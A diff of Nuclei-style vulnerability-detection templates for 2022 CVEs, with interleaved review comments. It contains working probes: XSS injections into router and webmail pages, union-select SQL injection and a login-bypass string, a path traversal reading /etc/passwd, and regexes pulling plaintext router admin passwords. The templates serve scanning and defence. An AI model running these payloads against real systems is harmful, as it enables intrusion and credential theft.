@@ -47,7 +37,15 @@ http: - | GET /admin/users/index.php HTTP/1.1 Host: {{Hostname}} - + extractors: + - type: regex + name: formtoken + part: body + group: 1 + regex: + - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>' + internal: true + cookie-reuse: true matchers-condition: and matchers: - type: word @@ -56,22 +54,10 @@ http: - "<p><b><script>alert(document.cookie)</script>" - "WBCECMS" condition: and - - type: word part: header words: - text/html - - type: status status: - 200 - - extractors: - - type: regex - name: formtoken - group: 1 - regex: - - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>' - internal: true - part: body -# digest: 4b0a004830460221008ffe47614c146f0db8a32472174c85a7f7980fef4712e5c0d368b668aadc27a302210081d7a5d6c9bf2cfdbaeea1f2fbcae70e2e042b3806b7efc4fb7a0ac8217fef54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-30489.yaml b/poc/cve/CVE-2022-30489.yaml index fa2302aea9..26c50ffda2 100644 --- a/poc/cve/CVE-2022-30489.yaml +++ b/poc/cve/CVE-2022-30489.yaml 
@@ -1,24 +1,34 @@ id: CVE-2022-30489 + info: - name: Wavlink Wn535g3 - POST XSS + name: Wavlink WN-535G3 - Cross-Site Scripting author: For3stCo1d severity: medium description: | - WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi. + Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://github.com/badboycxcc/XSS-CVE-2022-30489 - - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 - https://github.com/badboycxcc/XSS + - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30489 cwe-id: CWE-79 + epss-score: 0.00101 + epss-percentile: 0.4119 + cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn535g3_firmware shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" tags: xss,cve2022,wavlink,cve,router,iot -requests: + +http: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 @@ -26,6 +36,7 @@ requests: Content-Type: application/x-www-form-urlencoded newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn + matchers-condition: and matchers: - type: word 
@@ -33,10 +44,13 @@ requests: - '<script>alert(document.domain);</script>' - 'parent.location.replace("http://")' condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a00473045022100c3998020833570168c8a520e8e3e9cba021783a9b78a1a83f85ba5f17f4725e302204743fb961bd8f4f6903b05bdd279a8be536ddaaacae15f1732e58101d30d715d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-30776.yaml b/poc/cve/CVE-2022-30776.yaml index 01d041919e..13cca2459e 100644 --- a/poc/cve/CVE-2022-30776.yaml +++ b/poc/cve/CVE-2022-30776.yaml 
@@ -1,53 +1,38 @@ id: CVE-2022-30776 - info: - name: Atmail 6.5.0 - Cross-Site Scripting + name: Atmail - Cross Site Scripting author: 3th1c_yuk1 severity: medium description: | - Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter. - remediation: | - Apply the latest security patches or upgrade to a newer version of Atmail that addresses this vulnerability. + atmail 6.5.0 allows XSS via the index.php/admin/index/ error parameter. reference: - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9 - https://www.atmail.com/ - - https://help.atmail.com/hc/en-us/sections/115003283988 - https://nvd.nist.gov/vuln/detail/CVE-2022-30776 - - https://medium.com/%40bhattronit96/cve-2022-30776-cd34f977c2b9 + - https://help.atmail.com/hc/en-us/sections/115003283988 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30776 cwe-id: CWE-79 - epss-score: 0.0013 - epss-percentile: 0.47644 - cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: atmail - product: atmail shodan-query: http.html:"atmail" + verified: "true" tags: cve,cve2022,atmail,xss - -http: +requests: - method: GET path: - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word part: body words: - "Error: 1<script>alert(document.domain)</script>" - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a00473045022100fc7c2a085b98fc4d069ddca8da1e86478eee97e73e987de37a959df1966e2da3022027bf812e355c6f7c909e8f042ca53952bb8247e5ed3f9c0f92af5fc4b2dbb4ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-30777.yaml b/poc/cve/CVE-2022-30777.yaml index 2c50f208fc..64534b602c 100644 --- a/poc/cve/CVE-2022-30777.yaml +++ b/poc/cve/CVE-2022-30777.yaml 
@@ -1,38 +1,54 @@ id: CVE-2022-30777 + info: - name: Parallels H-Sphere - Cross Site Scripting + name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting author: 3th1c_yuk1 severity: medium description: | - Parallels H-Sphere 3.6.1713 allows XSS via the index_en.php from parameter. + Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. + remediation: | + Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 - - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 - https://en.wikipedia.org/wiki/H-Sphere + - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 + - https://medium.com/%40bhattronit96/cve-2022-30777-45725763ab59 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30777 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.41109 + cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: parallels + product: h-sphere shodan-query: title:"h-sphere" - verified: "true" tags: cve,cve2022,parallels,hsphere,xss -requests: + +http: - method: GET path: - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + stop-at-first-match: true + matchers-condition: and matchers: - type: word words: - '<TITLE>"><script>alert(document.domain)</script>' + - type: word part: header words: - "text/html" + - type: status status: - 200 +# digest: 490a004630440220395810658e7a6e75c7e6be09c6f0cc6296b7b3ff7e63e262149b60c34ccb64520220657971320378b3ec006504c842a8a89480c3f29f05edabd1228e2c977c1c46f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-32007.yaml b/poc/cve/CVE-2022-32007.yaml index b79eea8b8a..cc29bbd8fc 100644 
--- a/poc/cve/CVE-2022-32007.yaml +++ b/poc/cve/CVE-2022-32007.yaml @@ -1,13 +1,10 @@ id: CVE-2022-32007 - info: - name: Complete Online Job Search System 1.0 - SQL Injection + name: Complete Online Job Search System v1.0 - SQL Injection author: arafatansari severity: high description: | - Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. + Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/company/index.php?view=edit&id=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32007 @@ -16,19 +13,12 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32007 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 - cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 2 - vendor: complete_online_job_search_system_project - product: complete_online_job_search_system + verified: "true" tags: cve,cve2022,sqli,eris,authenticated variables: num: "999999999" - -http: +requests: - raw: - | POST /admin/login.php HTTP/1.1 
@@ -39,10 +29,9 @@ http: - | GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true matchers: - type: word part: body words: - '{{md5({{num}})}}' -# digest: 4a0a0047304502204e81c3b94f8a7af4a67f3516242889aa363d3d1169c07aa2e615789d052c5d9202210083e8c7c37c641f47168fbb758803368887fe29a24a2b23c2401c8364d6244b16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-32025.yaml b/poc/cve/CVE-2022-32025.yaml index 264da82048..fb24e14552 100644 --- a/poc/cve/CVE-2022-32025.yaml +++ b/poc/cve/CVE-2022-32025.yaml @@ -1,13 +1,10 @@ id: CVE-2022-32025 - info: - name: Car Rental Management System 1.0 - SQL Injection + name: Car Rental Management System v1.0 - SQL Injection author: arafatansari severity: high description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/view_car.php?id=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 
@@ -16,21 +13,14 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32025 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 2 - vendor: car_rental_management_system_project - product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" tags: cve,cve2022,carrental,cms,sqli,authenticated variables: num: "999999999" - -http: +requests: - raw: - | POST /admin/ajax.php?action=login HTTP/1.1 @@ -41,19 +31,16 @@ http: - | GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 Host: {{Hostname}} - skip-variables-check: true - host-redirects: true + redirects: true max-redirects: 2 - + cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '{{md5({{num}})}}' - - type: status status: - 200 -# digest: 490a0046304402201c659aed3475be0b4143ad2c71a723a996683763cae5e023475670ad40e6ed1402207ab4c5e7974da37287538ba07a5aa3c94b43baa7c3ba2d278e5ac2c876c9638f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-32028.yaml b/poc/cve/CVE-2022-32028.yaml index 6afb4dca59..5213c17713 100644 --- a/poc/cve/CVE-2022-32028.yaml +++ b/poc/cve/CVE-2022-32028.yaml 
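Review bot: In the second CVE-2022-32025 hunk, `host-redirects: true` becomes `redirects: true`, which as far as I know lets the client follow redirects to any host rather than only the scanned one, so an authenticated scan can end up sending requests to systems outside the agreed scope. I would keep `host-redirects: true` next to `max-redirects: 2`. The same hunk removes `skip-variables-check: true` and the status/word matchers are unchanged, so nothing else compensates for the wider redirect behaviour. The move back to `requests:` and `cookie-reuse: true` looks like a revert to older template syntax; worth confirming the runner version still accepts these keys.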
@@ -1,10 +1,13 @@ id: CVE-2022-32028 + info: - name: Car Rental Management System v1.0 - SQL Injection + name: Car Rental Management System 1.0 - SQL Injection author: arafatansari severity: high description: | - Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. + Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 @@ -13,14 +16,21 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32028 cwe-id: CWE-89 + epss-score: 0.00666 + epss-percentile: 0.77425 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + verified: true + max-request: 2 + vendor: car_rental_management_system_project + product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" - verified: "true" + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated variables: num: "999999999" -requests: + +http: - raw: - | POST /admin/ajax.php?action=login HTTP/1.1 
@@ -31,16 +41,19 @@ requests: - | GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 Host: {{Hostname}} + skip-variables-check: true - redirects: true + host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word part: body words: - '{{md5({{num}})}}' + - type: status status: - 200 +# digest: 4a0a00473045022100efcc8c42d2c7d8e0f883b365a7a7dbc51f136352d76ef5ae604c6f8db799645d0220194184d080e4b2f9beca67a2f8a38c24e38d2d95aab2f39b084a32cdb67b6260:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-32409.yaml b/poc/cve/CVE-2022-32409.yaml index aec3372d91..5a04e58cce 100644 --- a/poc/cve/CVE-2022-32409.yaml +++ b/poc/cve/CVE-2022-32409.yaml 
@@ -1,31 +1,44 @@ id: CVE-2022-32409 + info: - name: i3geo - Directory Traversal + name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion author: pikpikcu severity: critical - description: A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request + description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. + remediation: | + Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability. reference: - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt - - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-32409 - cwe-id: CWE-94 + cwe-id: CWE-22 + epss-score: 0.6578 + epss-percentile: 0.97589 + cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: softwarepublico + product: i3geo shodan-query: http.html:"i3geo" - verified: "true" tags: cve,cve2022,i3geo,lfi -requests: + +http: - method: GET path: - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 +# digest: 4b0a00483046022100982efe640cb6813105d3e0502ee86bbbebfa66f171ed4987bc0b27ba8c9918b70221009fba91ef1dca049c5cef1657c0a6b88bfaf5c281fee3779d14f302fbc1751567:922c64590222798bb761d5b6d8e72950 \ No 
newline at end of file diff --git a/poc/cve/CVE-2022-32444.yaml b/poc/cve/CVE-2022-32444.yaml index 1460ae469c..b8298e2bc8 100644 --- a/poc/cve/CVE-2022-32444.yaml +++ b/poc/cve/CVE-2022-32444.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. + remediation: | + Apply the latest patch or update to a version that has fixed this vulnerability. reference: - https://github.com/u5cms/u5cms/issues/50 - https://nvd.nist.gov/vuln/detail/CVE-2022-32444 @@ -14,9 +16,16 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32444 cwe-id: CWE-601 + epss-score: 0.00252 + epss-percentile: 0.62982 + cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: yuba + product: u5cms tags: cve,cve2022,redirect,u5cms,cms -requests: +http: - method: GET path: - '{{BaseURL}}/loginsave.php?u=http://interact.sh' @@ -25,6 +34,5 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by cs 05/30/2022 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100a78914985e18f5cbb208997f1dd7b38bb25273066dafdf058a929e48393ec9da02207604d0175228d8ce01f127bc96c071e03e41cde12f8736b825a78a436f806972:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-33119.yaml b/poc/cve/CVE-2022-33119.yaml index 223c8ed044..d0b19c4e99 100644 --- a/poc/cve/CVE-2022-33119.yaml +++ b/poc/cve/CVE-2022-33119.yaml 
@@ -1,10 +1,13 @@ id: CVE-2022-33119 + info: - name: NVRsolo v03.06.02 - Cross-Site Scripting + name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting author: arafatansari severity: medium description: | - NUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php. + NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software. reference: - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2022-33119 @@ -13,11 +16,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-33119 cwe-id: CWE-79 + epss-score: 0.012 + epss-percentile: 0.83584 + cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: nuuo + product: nvrsolo_firmware shodan-query: http.html:"NVRsolo" - verified: "true" tags: cve,cve2022,nvrsolo,xss -requests: + +http: - raw: - | POST /login.php HTTP/1.1 @@ -26,10 +36,12 @@ requests: Referer: "><script>alert(document.domain)</script><" language=en&user=user&pass=pass&submit=Login + matchers: - type: dsl dsl: - - 'contains(all_headers, "text/html")' + - 'contains(header, "text/html")' - 'status_code == 200' - contains(body,'<script>alert(document.domain)</script><\"?cmd=') condition: and +# digest: 490a00463044022055db44d33899d503ee6b8626525ec80f6f661c9e201e4b7f07e31700d0b2d09c02202725713186cb86ccc2ab145817d43f3c76880a377db2cc2b1c36ccbc048962fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-34046.yaml b/poc/cve/CVE-2022-34046.yaml index 0e55de9a03..d82b9bd94d 100644 --- a/poc/cve/CVE-2022-34046.yaml +++ b/poc/cve/CVE-2022-34046.yaml 
@@ -1,22 +1,40 @@ id: CVE-2022-34046 + info: - name: Wavlink Sysinit.shtml - Password Exposure + name: WAVLINK WN533A8 - Improper Access Control author: For3stCo1d severity: high description: | - An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);]. + WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046 + - http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-34046 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-34046 + cwe-id: CWE-863 + epss-score: 0.21264 + epss-percentile: 0.95934 + cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true + max-request: 1 + vendor: wavlink + product: wn533a8_firmware shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,wavlink,router,exposure -requests: + tags: packetstorm,cve,cve2022,wavlink,router,exposure + +http: - raw: - | GET /sysinit.shtml?r=52300 HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word 
@@ -25,10 +43,13 @@ requests: - 'var syspasswd="' - '<title>APP' condition: and + - type: status status: - 200 + extractors: - type: regex regex: - 'syspasswd="(.+?)"' +# digest: 4b0a00483046022100bafc9417f898a2840edb34b17f554073320d96a46a4e44a009a4350115aac1bc022100c10d0717b078a31e6af838fde56852768f583696680154acb50c5266f8ea8960:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-34047.yaml b/poc/cve/CVE-2022-34047.yaml index 8bb1d25c72..4601f6daa5 100644 --- a/poc/cve/CVE-2022-34047.yaml +++ b/poc/cve/CVE-2022-34047.yaml 
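Review bot: The `extractors` block at the end of CVE-2022-34046.yaml prints whatever follows `syspasswd="` in the response, so the device's plaintext admin password is written into scan results and into any report or ticket generated from them. The two matchers above it already establish the exposure, so the extractor adds no detection value. Either drop it or add a comment such as `# extracted value is the device admin password; handle scan output as credential material`. The same extractor is present in CVE-2022-34047.yaml further down.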
@@ -1,40 +1,22 @@ id: CVE-2022-34047 - info: - name: WAVLINK WN530HG4 - Improper Access Control + name: Wavlink Set_safety.shtml - Password Exposure author: For3stCo1d severity: high description: | - WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Apply the latest firmware update provided by the vendor to fix the access control issue. + An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd]. reference: - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047 - - http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-34047 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-34047 - cwe-id: CWE-668 - epss-score: 0.22865 - epss-percentile: 0.96043 - cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 - vendor: wavlink - product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" - tags: cve2022,wavlink,router,exposure,packetstorm,cve - -http: + tags: cve,cve2022,wavlink,router,exposure +requests: - raw: - | GET /set_safety.shtml?r=52300 HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word 
@@ -43,13 +25,10 @@ http: - 'var syspasswd="' - 'APP' condition: and - - type: status status: - 200 - extractors: - type: regex regex: - 'syspasswd="(.+?)"' -# digest: 4a0a0047304502203e6425d62dbc524c88d9f4d728e5428b5519a34035c0500d1ed02ee54cff39c7022100ff3de55402f12ada4d323b5ae463cba5dbb44baeb439269ce989ceb58f13ade5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-34048.yaml b/poc/cve/CVE-2022-34048.yaml index 7292a945a4..7e4a956e81 100644 --- a/poc/cve/CVE-2022-34048.yaml +++ b/poc/cve/CVE-2022-34048.yaml 
@@ -1,41 +1,55 @@ id: CVE-2022-34048 + info: - name: Wavlink WN533A8 - Cross-Site Scripting (XSS) + name: Wavlink WN-533A8 - Cross-Site Scripting author: ritikchaddha severity: medium description: | - Wavlink WN533A8 M33A8.V5030.190716 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login_page parameter. + Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/50989 - - https://nvd.nist.gov/vuln/detail/CVE-2022-34048 - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing + - https://nvd.nist.gov/vuln/detail/CVE-2022-34048 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-34048 cwe-id: CWE-79 + epss-score: 0.0009 + epss-percentile: 0.38133 + cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn533a8_firmware shodan-query: http.html:"Wavlink" - verified: "true" - tags: cve,cve2022,wavlink,xss,router -requests: + tags: cve2022,wavlink,xss,router,edb,cve + +http: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 Host: {{Hostname}} newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en + matchers-condition: and matchers: - type: word part: body words: - 'x");alert(9);x=("?login=0");' + - type: word part: header words: - "text/html" + - type: status status: - 200 +# digest: 
4a0a004730450221009bdc77f77eb66f778dee6a75e98c88a6bcd5e808092e54fda860131ddb410dfa02203dd0c252c21a4aa4cb205a96dd5488ddb1fccc30d33ba60d892a8c2e61f3b4f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-34049.yaml b/poc/cve/CVE-2022-34049.yaml index 6a78378e04..18d404e7f4 100644 --- a/poc/cve/CVE-2022-34049.yaml +++ b/poc/cve/CVE-2022-34049.yaml 
@@ -1,29 +1,41 @@ id: CVE-2022-34049 + info: - name: Wavlink Exportlogs.sh - Configuration Exposure + name: WAVLINK WN530HG4 - Improper Access Control author: For3stCo1d severity: medium description: | - An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows unauthenticated attackers to download log files and configuration data. + Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049 - https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing + - https://nvd.nist.gov/vuln/detail/CVE-2022-34049 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-34049 cwe-id: CWE-552 + epss-score: 0.14992 + epss-percentile: 0.95267 + cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" tags: cve,cve2022,wavlink,router,exposure -requests: + +http: - raw: - | GET /cgi-bin/ExportLogs.sh HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word 
